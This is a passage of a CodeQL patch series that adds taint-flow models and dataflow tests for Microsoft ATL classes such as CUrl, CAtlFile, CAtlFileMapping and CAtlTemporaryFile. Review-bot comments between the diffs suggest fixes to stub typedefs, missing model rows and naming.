| | +| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:883:3:883:3 | url2 | | +| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:886:5:886:8 | url2 | | +| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:887:10:887:13 | url2 | | +| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:888:3:888:3 | url2 | | +| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:887:10:887:13 | url2 | | +| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:888:3:888:3 | url2 | | +| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:891:5:891:8 | url2 | | +| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:892:10:892:13 | url2 | | +| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:893:3:893:3 | url2 | | +| atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:892:10:892:13 | url2 | | +| atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:893:3:893:3 | url2 | | +| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:896:5:896:8 | url2 | | +| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:897:10:897:13 | url2 | | +| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:898:3:898:3 | url2 | | +| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:897:10:897:13 | url2 | | +| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:898:3:898:3 | url2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 300e3eaba681fc50ba0d9914e16267b7b22f1e33 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:09:22 +0000 Subject: [PATCH 0741/1267] C++: Add MaD model for 'CUrl'. --- cpp/ql/lib/ext/CUrl.model.yml | 21 ++++++++++++++ .../dataflow/taint-tests/atl.cpp | 28 +++++++++---------- 2 files changed, 35 insertions(+), 14 deletions(-) create mode 100644 cpp/ql/lib/ext/CUrl.model.yml diff --git a/cpp/ql/lib/ext/CUrl.model.yml b/cpp/ql/lib/ext/CUrl.model.yml new file mode 100644 index 00000000000..3a4f8fe2ff5 --- /dev/null +++ b/cpp/ql/lib/ext/CUrl.model.yml 
@@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # TODO this model can be improved a lot once we have MapKey content # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CUrl", True, "CUrl", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CUrl", True, "CrackUrl", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "CreateUrl", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["", "CUrl", True, "GetExtraInfo", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetHostName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetPassword", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetSchemeName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetUrlPath", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetUserName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "SetExtraInfo", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetHostName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetPassword", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetSchemeName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetUrlPath", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetUserName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 1727684b51a..de3df30b283 100644 
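Review bot: The `data:` line of CUrl.model.yml runs the TODO and the column legend together in one comment, and nothing records what the whole-object approach means for results. Every setter taints the CUrl as a whole and every getter reads from the whole, so `SetUrlPath(x)` also taints `GetHostName()` and `GetPassword()`. I would put the TODO on its own line and add `# Coarse model: taint is per object, not per URL component, so flow to individual getters is over-approximated.` below it. Query authors who key on the host or credential getters then know to expect extra results.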
--- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -850,13 +850,13 @@ void test_CUrl() { char* x = indirect_source(); CUrl url; url.CrackUrl(x, 0); - sink(url); // $ MISSING: ir - sink(url.GetExtraInfo()); // $ MISSING: ir - sink(url.GetHostName()); // $ MISSING: ir - sink(url.GetPassword()); // $ MISSING: ir - sink(url.GetSchemeName()); // $ MISSING: ir - sink(url.GetUrlPath()); // $ MISSING: ir - sink(url.GetUserName()); // $ MISSING: ir + sink(url); // $ ir + sink(url.GetExtraInfo()); // $ ir + sink(url.GetHostName()); // $ ir + sink(url.GetPassword()); // $ ir + sink(url.GetSchemeName()); // $ ir + sink(url.GetUrlPath()); // $ ir + sink(url.GetUserName()); // $ ir { CUrl url2; @@ -864,36 +864,36 @@ void test_CUrl() { char buffer[1024]; url2.CrackUrl(x, 0); url2.CreateUrl(buffer, &len, 0); - sink(buffer); // $ ast MISSING: ir + sink(buffer); // $ ast ir } { CUrl url2; url2.SetExtraInfo(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetHostName(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetPassword(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetSchemeName(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetUrlPath(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetUserName(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } } \ No newline at end of file From e73fccdb4a0251641c871c32d926b954522b8cc5 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:10:16 +0000 Subject: [PATCH 0742/1267] C++: Add more types that we'll need for later. --- .../dataflow/source-sink-tests/atl.cpp | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp 
diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp new file mode 100644 index 00000000000..8b3174b8046 --- /dev/null +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -0,0 +1,56 @@ +typedef void* HANDLE; +typedef long LONG; +typedef LONG HRESULT; +typedef const char* LPCTSTR; +typedef unsigned long DWORD; +typedef unsigned long ULONG; +typedef void* PVOID; +typedef void* LPVOID; +typedef bool BOOL; +typedef const void* LPCVOID; +typedef unsigned long long ULONGLONG; +typedef long long LONGLONG; +typedef unsigned long* ULONG_PTR; +typedef char *LPTSTR; +typedef DWORD* LPDWORD; +typedef ULONG REGSAM; +typedef DWORD SECURITY_INFORMATION, *PSECURITY_INFORMATION; +typedef PVOID PSECURITY_DESCRIPTOR; +typedef struct _GUID { + unsigned long Data1; + unsigned short Data2; + unsigned short Data3; + unsigned char Data4[8]; +} GUID; +typedef GUID* REFGUID; + +typedef struct _SECURITY_ATTRIBUTES { + DWORD nLength; + LPVOID lpSecurityDescriptor; + BOOL bInheritHandle; +} SECURITY_ATTRIBUTES, *PSECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES; + +typedef struct _FILETIME { + DWORD dwLowDateTime; + DWORD dwHighDateTime; +} FILETIME, *PFILETIME, *LPFILETIME; + +using size_t = decltype(sizeof(int)); +using SIZE_T = size_t; + +typedef struct _OVERLAPPED { + ULONG_PTR Internal; + ULONG_PTR InternalHigh; + union { + struct { + DWORD Offset; + DWORD OffsetHigh; + } DUMMYSTRUCTNAME; + PVOID Pointer; + } DUMMYUNIONNAME; + HANDLE hEvent; +} OVERLAPPED, *LPOVERLAPPED; + +using LPOVERLAPPED_COMPLETION_ROUTINE = void(DWORD, DWORD, LPOVERLAPPED); + +using HKEY = void*; From dee47f2111a3ae001ad69df7ba37a858bf287107 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:18:07 +0000 Subject: [PATCH 0743/1267] C++: Add a failing test with 'CAtlFile'. --- .../dataflow/source-sink-tests/atl.cpp | 81 +++++++++++++++++++ 1 file changed, 81 insertions(+) 
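Review bot: Several typedefs in this new stub header differ from the Windows definitions in ways that change pointer depth. `typedef unsigned long* ULONG_PTR;` turns an integer type into a pointer, `typedef GUID* REFGUID;` turns a reference into a pointer, and `typedef bool BOOL;` changes the underlying type. The models in this series are written in terms of indirections (`Argument[*0]`, `ReturnValue[*]`), so an extra pointer level in a stub can make an expectation pass or fail for reasons that do not hold against the real headers. I would use `typedef unsigned long long ULONG_PTR;`, `typedef const GUID& REFGUID;` and `typedef int BOOL;`.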
diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 8b3174b8046..bcc75fe0bd1 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp 
@@ -54,3 +54,84 @@ typedef struct _OVERLAPPED { using LPOVERLAPPED_COMPLETION_ROUTINE = void(DWORD, DWORD, LPOVERLAPPED); using HKEY = void*; + +class CAtlTransactionManager; + +class CHandle { + CHandle() throw(); + CHandle(CHandle& h) throw(); + explicit CHandle(HANDLE h) throw(); +}; + +struct CAtlFile : public CHandle { + CAtlFile() throw(); + CAtlFile(CAtlTransactionManager* pTM) throw(); + CAtlFile(CAtlFile& file) throw(); + explicit CAtlFile(HANDLE hFile) throw(); + + HRESULT Create( + LPCTSTR szFilename, + DWORD dwDesiredAccess, + DWORD dwShareMode, + DWORD dwCreationDisposition, + DWORD dwFlagsAndAttributes, + LPSECURITY_ATTRIBUTES lpsa, + HANDLE hTemplateFile) throw(); + + HRESULT Flush() throw(); + HRESULT GetOverlappedResult( + LPOVERLAPPED pOverlapped, + DWORD& dwBytesTransferred, + BOOL bWait + ) throw(); + + HRESULT GetPosition(ULONGLONG& nPos) const throw(); + HRESULT GetSize(ULONGLONG& nLen) const throw(); + HRESULT LockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize) throw(); + + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + DWORD& nBytesRead) throw(); + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped) throw(); + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped, + LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); + + HRESULT Seek( + LONGLONG nOffset, + DWORD dwFrom) throw(); + + HRESULT SetSize(ULONGLONG nNewLen) throw(); + HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped, + LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + DWORD* pnBytesWritten) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped) throw(); +}; + +void test_CAtlFile() { + CAtlFile catFile; + char buffer[1024]; + catFile.Read(buffer, 1024); // $ 
MISSING: local_source +} From 74eae4a18dd1fa02e6256ea41e156b4c918ff9b6 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:21:45 +0000 Subject: [PATCH 0744/1267] C++: Add a MaD model for 'CAtlFile' and mark reads as local flow sources. --- cpp/ql/lib/ext/CAtlFile.model.yml | 9 +++++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../cpp/models/implementations/CAtlFile.qll | 17 +++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 2 +- 4 files changed, 28 insertions(+), 1 deletion(-) create mode 100644 cpp/ql/lib/ext/CAtlFile.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll diff --git a/cpp/ql/lib/ext/CAtlFile.model.yml b/cpp/ql/lib/ext/CAtlFile.model.yml new file mode 100644 index 00000000000..03584d62f03 --- /dev/null +++ b/cpp/ql/lib/ext/CAtlFile.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlFile", True, "CAtlFile", "(CAtlFile &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CAtlFile", True, "CAtlFile", "(HANDLE)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index b371e6dc116..37c97dcca8d 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -53,3 +53,4 @@ private import implementations.Win32CommandExecution private import implementations.CA2AEX private import implementations.CComBSTR private import implementations.CPathT +private import implementations.CAtlFile 
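Review bot: `test_CAtlFile` exercises only the two-argument `Read(buffer, 1024)`, although the struct declares four `Read` overloads, so the source model is never checked against the `nBytesRead` or `LPOVERLAPPED` forms. One call per overload, each with its own expectation comment, would pin that every overload's buffer is treated as file input, for example `DWORD n; catFile.Read(buffer, 1024, n); // $ MISSING: local_source`. Separately, `class CHandle` declares its constructors under the default private access of `class`; a `public:` line before them would match how `CAtlFile` derives from and constructs it.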
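Review bot: The summary rows in CAtlFile.model.yml cover `Create` and `Read` but not `Write`, whereas the CAtlTemporaryFile model added later in this series does carry a `Write` row, so the two file classes propagate taint differently for the same operation. If the omission is not deliberate, add `- ["", "CAtlFile", True, "Write", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]`. The copy-constructor signature is spelled `(CAtlFile &)` here and `(CRegKey&)` in CRegKey.model.yml; it is worth confirming both spellings are matched and then using one form throughout.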
diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll new file mode 100644 index 00000000000..6c01a29c539 --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll @@ -0,0 +1,17 @@ +import semmle.code.cpp.models.interfaces.FlowSource + +/** + * The `CAtlFile` class from Microsoft's Active Template Library. + */ +class CAtlFile extends Class { + CAtlFile() { this.hasGlobalName("CAtlFile") } +} + +private class CAtlFileRead extends MemberFunction, LocalFlowSourceFunction { + CAtlFileRead() { this.getClassAndName("Read") instanceof CAtlFile } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isParameterDeref(0) and + description = "string read by " + this.getName() + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index bcc75fe0bd1..2724e42aa34 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -133,5 +133,5 @@ struct CAtlFile : public CHandle { void test_CAtlFile() { CAtlFile catFile; char buffer[1024]; - catFile.Read(buffer, 1024); // $ MISSING: local_source + catFile.Read(buffer, 1024); // $ local_source } From ac0599cf75a4b1f50ca7fbe9317ded9bb2d136ba Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:24:35 +0000 Subject: [PATCH 0745/1267] C++: Add a failing test with 'CAtlFileMapping'. --- .../dataflow/source-sink-tests/atl.cpp | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 2724e42aa34..63d1bb17105 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp 
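Review bot: The source description `"string read by " + this.getName()` in `CAtlFileRead` mislabels what `Read` produces: the buffer is an `LPVOID` filled with file bytes, and the CAtlFileMapping model in this series says "data read by" for the same kind of input. Suggest `description = "data read by " + this.getName()` so alerts describe file input consistently. The top-level `import semmle.code.cpp.models.interfaces.FlowSource` is also a public import, unlike the `private import` lines in CRegKey.qll; `private import` would avoid re-exporting that module. Since `CAtlFileRead` matches every `Read` overload by name and always reports parameter 0, a one-line QLDoc saying so would help the next reader.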
@@ -135,3 +135,47 @@ void test_CAtlFile() { char buffer[1024]; catFile.Read(buffer, 1024); // $ local_source } + +struct CAtlFileMappingBase { + CAtlFileMappingBase(CAtlFileMappingBase& orig); + CAtlFileMappingBase() throw(); + ~CAtlFileMappingBase() throw(); + + HRESULT CopyFrom(CAtlFileMappingBase& orig) throw(); + void* GetData() const throw(); + HANDLE GetHandle() throw (); + SIZE_T GetMappingSize() throw(); + + HRESULT MapFile( + HANDLE hFile, + SIZE_T nMappingSize, + ULONGLONG nOffset, + DWORD dwMappingProtection, + DWORD dwViewDesiredAccess) throw(); + + HRESULT MapSharedMem( + SIZE_T nMappingSize, + LPCTSTR szName, + BOOL* pbAlreadyExisted, + LPSECURITY_ATTRIBUTES lpsa, + DWORD dwMappingProtection, + DWORD dwViewDesiredAccess) throw(); + + HRESULT OpenMapping( + LPCTSTR szName, + SIZE_T nMappingSize, + ULONGLONG nOffset, + DWORD dwViewDesiredAccess) throw(); + + HRESULT Unmap() throw(); +}; + +template +struct CAtlFileMapping : public CAtlFileMappingBase { + operator T*() const throw(); +}; + +void test_CAtlFileMapping(CAtlFileMapping mapping) { + char* data = static_cast(mapping); // $ MISSING: local_source + void* data2 = mapping.GetData(); // $ MISSING: local_source +} From 3709151353ecf426f73341a35d0642d5f91de93b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:31:12 +0000 Subject: [PATCH 0746/1267] C++: Add a MaD model for 'CAtlFileMappingBase' and mark reads as local flow sources. --- cpp/ql/lib/ext/CAtlFileMappingBase.model.yml | 13 +++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../implementations/CAtlFileMapping.qll | 37 +++++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 4 +- 4 files changed, 53 insertions(+), 2 deletions(-) create mode 100644 cpp/ql/lib/ext/CAtlFileMappingBase.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll 
diff --git a/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml b/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml new file mode 100644 index 00000000000..dcf9fd6ca70 --- /dev/null +++ b/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlFileMappingBase", True, "CAtlFileMappingBase", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CAtlFileMappingBase", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "GetData", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "GetHandle", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "MapFile", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "MapSharedMem", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "OpenMapping", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index 37c97dcca8d..f6ff93061af 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -54,3 +54,4 @@ private import implementations.CA2AEX private import implementations.CComBSTR private import implementations.CPathT private import implementations.CAtlFile +private import implementations.CAtlFileMapping diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll new file mode 100644 index 00000000000..85dae06806f --- /dev/null 
+++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll @@ -0,0 +1,37 @@ +import semmle.code.cpp.models.interfaces.FlowSource + +/** + * The `CAtlFileMapping` class from Microsoft's Active Template Library. + */ +class CAtlFileMapping extends Class { + CAtlFileMapping() { this.hasGlobalName("CAtlFileMapping") } +} + +/** + * The `CAtlFileMappingBase` class from Microsoft's Active Template Library. + */ +class CAtlFileMappingBase extends Class { + CAtlFileMappingBase() { this.hasGlobalName("CAtlFileMappingBase") } +} + +private class CAtlFileMappingBaseGetData extends MemberFunction, LocalFlowSourceFunction { + CAtlFileMappingBaseGetData() { + this.getClassAndName("GetData") = any(CAtlFileMappingBase fileMaping).getADerivedClass*() + } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isReturnValueDeref(1) and + description = "data read by " + this.getName() + } +} + +private class CAtlFileMappingGetData extends MemberFunction, LocalFlowSourceFunction { + CAtlFileMappingGetData() { + this.(ConversionOperator).getDeclaringType() instanceof CAtlFileMapping + } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isReturnValueDeref(1) and + description = "data read by " + this.getName() + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 63d1bb17105..8a9f9f0ea0a 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -176,6 +176,6 @@ struct CAtlFileMapping : public CAtlFileMappingBase { }; void test_CAtlFileMapping(CAtlFileMapping mapping) { - char* data = static_cast(mapping); // $ MISSING: local_source - void* data2 = mapping.GetData(); // $ MISSING: local_source + char* data = static_cast(mapping); // $ local_source + void* data2 = mapping.GetData(); // $ local_source } 
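Review bot: `CAtlFileMappingGetData` is a misleading name, because its characteristic predicate selects a `ConversionOperator` declared on `CAtlFileMapping` (the `operator T*` in the test stub), not `GetData`; a name such as `CAtlFileMappingConversion` plus a QLDoc line would keep the two source classes apart. The predicate also accepts any conversion operator on the class, so a future non-pointer conversion would be reported as mapped file data; only one operator is declared in view, so this is a caution rather than a current defect. In `CAtlFileMappingBaseGetData` the variable `fileMaping` is misspelled: `any(CAtlFileMappingBase fileMapping).getADerivedClass*()`.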
From 67ba85a0a3bf4c20f51fcf04c383fc876d48970c Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:32:59 +0000 Subject: [PATCH 0747/1267] C++: Add failing tests for 'CAtlTemporaryFile'. --- .../dataflow/source-sink-tests/atl.cpp | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 8a9f9f0ea0a..3440940a4f0 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -179,3 +179,39 @@ void test_CAtlFileMapping(CAtlFileMapping mapping) { char* data = static_cast(mapping); // $ local_source void* data2 = mapping.GetData(); // $ local_source } + +struct CAtlTemporaryFile { + CAtlTemporaryFile() throw(); + ~CAtlTemporaryFile() throw(); + HRESULT Close(LPCTSTR szNewName) throw(); + HRESULT Create(LPCTSTR pszDir, DWORD dwDesiredAccess) throw(); + HRESULT Flush() throw(); + HRESULT GetPosition(ULONGLONG& nPos) const throw(); + HRESULT GetSize(ULONGLONG& nLen) const throw(); + HRESULT HandsOff() throw(); + HRESULT HandsOn() throw(); + HRESULT LockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + DWORD& nBytesRead) throw(); + HRESULT Seek(LONGLONG nOffset, DWORD dwFrom) throw(); + + HRESULT SetSize(ULONGLONG nNewLen) throw(); + LPCTSTR TempFileName() throw(); + HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + DWORD* pnBytesWritten) throw(); + operator HANDLE() throw(); +}; + +void test_CAtlTemporaryFile() { + CAtlTemporaryFile file; + char buffer[1024]; + DWORD bytesRead; + file.Read(buffer, 1024, bytesRead); // $ MISSING: local_source +} From 33212da87621c003703992660b5ab524e38096eb Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:38:34 +0000 Subject: [PATCH 0748/1267] C++: Add a MaD model for 'CAtlTemporaryFile' and mark reads as local flow sources. --- cpp/ql/lib/ext/CAtlTemporaryFile.model.yml | 8 ++++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../implementations/CAtlTemporaryFile.qll | 17 +++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 2 +- 4 files changed, 27 insertions(+), 1 deletion(-) create mode 100644 cpp/ql/lib/ext/CAtlTemporaryFile.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll diff --git a/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml b/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml new file mode 100644 index 00000000000..71a05266a2d --- /dev/null +++ b/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlTemporaryFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlTemporaryFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["", "CAtlTemporaryFile", True, "Write", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index f6ff93061af..cd86b53f90e 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -55,3 +55,4 @@ private import implementations.CComBSTR private import implementations.CPathT private import implementations.CAtlFile private import implementations.CAtlFileMapping +private import implementations.CAtlTemporaryFile 
diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll new file mode 100644 index 00000000000..cc3a36d0fbd --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll @@ -0,0 +1,17 @@ +import semmle.code.cpp.models.interfaces.FlowSource + +/** + * The `CAtlFile` class from Microsoft's Active Template Library. + */ +class CAtlTemporaryFile extends Class { + CAtlTemporaryFile() { this.hasGlobalName("CAtlTemporaryFile") } +} + +private class CAtlTemporaryFileRead extends MemberFunction, LocalFlowSourceFunction { + CAtlTemporaryFileRead() { this.getClassAndName("Read") instanceof CAtlTemporaryFile } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isParameterDeref(0) and + description = "string read by " + this.getName() + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 3440940a4f0..35698f13e84 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -213,5 +213,5 @@ void test_CAtlTemporaryFile() { CAtlTemporaryFile file; char buffer[1024]; DWORD bytesRead; - file.Read(buffer, 1024, bytesRead); // $ MISSING: local_source + file.Read(buffer, 1024, bytesRead); // $ local_source } From 5aada39a4e0a146f880bd2d94b719f975fde5412 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter 